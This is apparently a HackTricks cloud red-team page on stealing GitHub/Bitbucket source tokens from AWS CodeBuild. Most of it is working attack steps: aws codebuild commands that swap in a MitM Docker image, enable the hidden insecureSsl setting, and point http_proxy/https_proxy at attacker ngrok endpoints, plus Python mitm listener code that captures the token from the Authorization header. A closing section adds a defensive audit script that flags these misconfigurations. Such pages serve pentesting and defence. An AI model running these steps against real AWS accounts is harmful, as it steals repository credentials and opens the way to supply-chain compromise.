AWS Codebuild - Token Leakage

Tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Get the configured Github/Bitbucket tokens

First, check whether any source credentials are configured that you could leak:

aws codebuild list-source-credentials

Via Docker image

If you find that authentication to, for example, Github is configured in the account, you can exfiltrate that access (a GH token or an OAuth token) by making CodeBuild use a custom Docker image to run the build of the project.

For this purpose you can create a new CodeBuild project or change the environment of an existing one to set the Docker image.

The Docker image you could use is https://github.com/carlospolop/docker-mitm. This is a very simple Docker image that sets the env variables https_proxy, http_proxy and SSL_CERT_FILE. It allows you to intercept most of the host's traffic through the proxy indicated in https_proxy and http_proxy, and makes the host trust the SSL certificate indicated in SSL_CERT_FILE.

  1. Build & push your own Docker MitM image
  • Follow the instructions in the repo to set your proxy IP address, set your SSL certificate and build the Docker image.
  • DO NOT SET http_proxy, so that you do not intercept requests to the metadata endpoint.
  • You can use ngrok, e.g. ngrok tcp 4444, to expose the proxy on your host.
  • Once the Docker image is built, push it to a public repo (Dockerhub, ECR…).
  2. Set the environment
  • Create a new CodeBuild project or modify the environment of an existing one.
  • Configure the project to use the previously built Docker image.
  3. Set up the MitM proxy on your host
  • As indicated in the Github repo, you can use something like:
mitmproxy --listen-port 4444 --allow-hosts "github.com"

Tip

The mitmproxy version used was 9.0.1; it was reported that with version 10 this might not work.

  4. Run the build & capture the credentials
  • You can see the token in the Authorization header:

This can also be done from the aws cli with something like:

# Create project using a Github connection
aws codebuild create-project --cli-input-json file:///tmp/buildspec.json

## Contents of /tmp/buildspec.json
## (use "type": "ARM_CONTAINER" in "environment" to run the ARM build of docker-mitm;
##  JSON does not allow inline comments, so keep the file free of them)
{
  "name": "my-demo-project",
  "source": {
    "type": "GITHUB",
    "location": "https://github.com/uname/repo",
    "buildspec": "buildspec.yml"
  },
  "artifacts": {
    "type": "NO_ARTIFACTS"
  },
  "environment": {
    "type": "LINUX_CONTAINER",
    "image": "docker.io/carlospolop/docker-mitm:v12",
    "computeType": "BUILD_GENERAL1_SMALL",
    "imagePullCredentialsType": "CODEBUILD"
  }
}

# Start the build (the name must match the one in the JSON file)
aws codebuild start-build --project-name my-demo-project

Via insecureSSL

CodeBuild projects have a setting called insecureSsl that is hidden in the web console; you can only change it through the API.
Enabling it allows CodeBuild to connect to the repository without verifying the certificate presented by the platform.

  • First you need to list the current configuration with something like:
aws codebuild batch-get-projects --name <proj-name>
  • Then, using the information you gathered, you can update the project setting insecureSsl to true. Below is an example of how I updated the project; note the insecureSsl=true at the end (this is the only thing you need to change from the configuration you gathered).
  • In addition, also add the env variables http_proxy and https_proxy pointing to your ngrok tcp tunnel, as follows:
aws codebuild update-project --name <proj-name> \
--source '{
"type": "GITHUB",
"location": "https://github.com/carlospolop/404checker",
"gitCloneDepth": 1,
"gitSubmodulesConfig": {
"fetchSubmodules": false
},
"buildspec": "version: 0.2\n\nphases:\n  build:\n    commands:\n       - echo \"sad\"\n",
"auth": {
"type": "CODECONNECTIONS",
"resource": "arn:aws:codeconnections:eu-west-1:947247140022:connection/46cf78ac-7f60-4d7d-bf86-5011cfd3f4be"
},
"reportBuildStatus": false,
"insecureSsl": true
}' \
--environment '{
"type": "LINUX_CONTAINER",
"image": "aws/codebuild/standard:5.0",
"computeType": "BUILD_GENERAL1_SMALL",
"environmentVariables": [
{
"name": "http_proxy",
"value": "http://2.tcp.eu.ngrok.io:15027"
},
{
"name": "https_proxy",
"value": "http://2.tcp.eu.ngrok.io:15027"
}
]
}'

from mitm import MITM, protocol, middleware, crypto

mitm = MITM(
    host="127.0.0.1",
    port=4444,
    protocols=[protocol.HTTP],
    middlewares=[middleware.Log],  # middleware.HTTPLog used for the example below.
    certificate_authority=crypto.CertificateAuthority(),
)
mitm.run()
  • Finally, click Build the project; the credentials will be sent in clear text (base64) to the mitm port:

Via the HTTP protocol

Tip

This vulnerability was corrected by AWS at some point the week of the 20th of Feb of 2023 (I think on Friday). So an attacker can't abuse it anymore :)

An attacker with elevated permissions in CodeBuild could leak the configured Github/Bitbucket token or, if the access was configured via OAuth, the temporary OAuth token used to access the code.

  • The attacker can add the environment variables http_proxy and https_proxy to the CodeBuild project, pointing to their own machine (for example http://5.tcp.eu.ngrok.io:14972).
  • Then, change the URL of the github repo so it uses HTTP instead of HTTPS, for example: http://github.com/carlospolop-forks/TestActions
  • Then, run the basic example from https://github.com/synchronizing/mitm on the port referenced by the proxy variables (http_proxy and https_proxy):
from mitm import MITM, protocol, middleware, crypto

mitm = MITM(
    host="0.0.0.0",
    port=4444,
    protocols=[protocol.HTTP],
    middlewares=[middleware.Log],  # middleware.HTTPLog used for the example below.
    certificate_authority=crypto.CertificateAuthority(),
)
mitm.run()
  • Next, click Build the project or start a build from the command line:
aws codebuild start-build --project-name <proj-name>
  • Finally, the credentials will be sent in clear text (base64) to the mitm port:

Warning

The attacker will now be able to use the token from their own machine, enumerate all the permissions it grants, and use or abuse it more easily than through the CodeBuild service directly.
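The three techniques above (a custom build image, insecureSsl, and proxy variables combined with a plaintext source URL) all leave traces in the project configuration that `batch-get-projects` returns. The following audit is an added example, not HackTricks or AWS code: `audit_project` works offline on a constructed project dict, and `audit_account` assumes boto3 is installed and the caller holds codebuild:ListProjects and codebuild:BatchGetProjects.

```python
import re

# Variables that redirect the build's git traffic through a proxy (both spellings).
PROXY_VARS = {"http_proxy", "https_proxy", "HTTP_PROXY", "HTTPS_PROXY"}
# AWS-curated images; any other image is user-supplied and could be a MitM image.
AWS_MANAGED_IMAGE = re.compile(r"^aws/codebuild/")


def audit_project(project: dict) -> list:
    """Return findings for one project dict as returned by batch-get-projects."""
    findings = []
    name = project.get("name", "<unnamed>")
    source = project.get("source", {})
    env = project.get("environment", {})
    if source.get("insecureSsl"):
        findings.append(f"{name}: source.insecureSsl is true (certificate checks disabled)")
    location = source.get("location", "")
    if location.lower().startswith("http://"):
        findings.append(f"{name}: source.location uses plaintext HTTP ({location})")
    for var in env.get("environmentVariables", []):
        if var.get("name") in PROXY_VARS:
            findings.append(f"{name}: proxy variable {var['name']}={var.get('value')}")
    image = env.get("image", "")
    if image and not AWS_MANAGED_IMAGE.match(image):
        findings.append(f"{name}: custom (non aws/codebuild) build image {image}")
    return findings


# Constructed sample in the shape of batch-get-projects output (not a real project).
SAMPLE_PROJECT = {
    "name": "demo-project",
    "source": {"type": "GITHUB", "location": "https://github.com/example/repo", "insecureSsl": True},
    "environment": {
        "image": "aws/codebuild/standard:5.0",
        "environmentVariables": [{"name": "https_proxy", "value": "http://proxy.example:4444"}],
    },
}


def audit_account(region: str) -> list:
    """Audit every project in a region; needs boto3 and ListProjects/BatchGetProjects rights."""
    import boto3  # imported here so the offline part of the module runs without it
    client = boto3.client("codebuild", region_name=region)
    names = []
    for page in client.get_paginator("list_projects").paginate():
        names.extend(page.get("projects", []))
    findings = []
    for i in range(0, len(names), 100):  # BatchGetProjects takes at most 100 names per call
        for proj in client.batch_get_projects(names=names[i:i + 100]).get("projects", []):
            findings.extend(audit_project(proj))
    return findings
```

Running `audit_project(SAMPLE_PROJECT)` reports both the insecureSsl flag and the https_proxy variable; a project created with the docker-mitm image from the first section would additionally be flagged for its non-AWS image.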

Untrusted PR execution via webhook filter misconfiguration

For the PR-triggered webhook bypass chain (ACTOR_ACCOUNT_ID regex + untrusted PR execution), check:

AWS CodeBuild - Untrusted PR Webhook Bypass (CodeBreach-style)
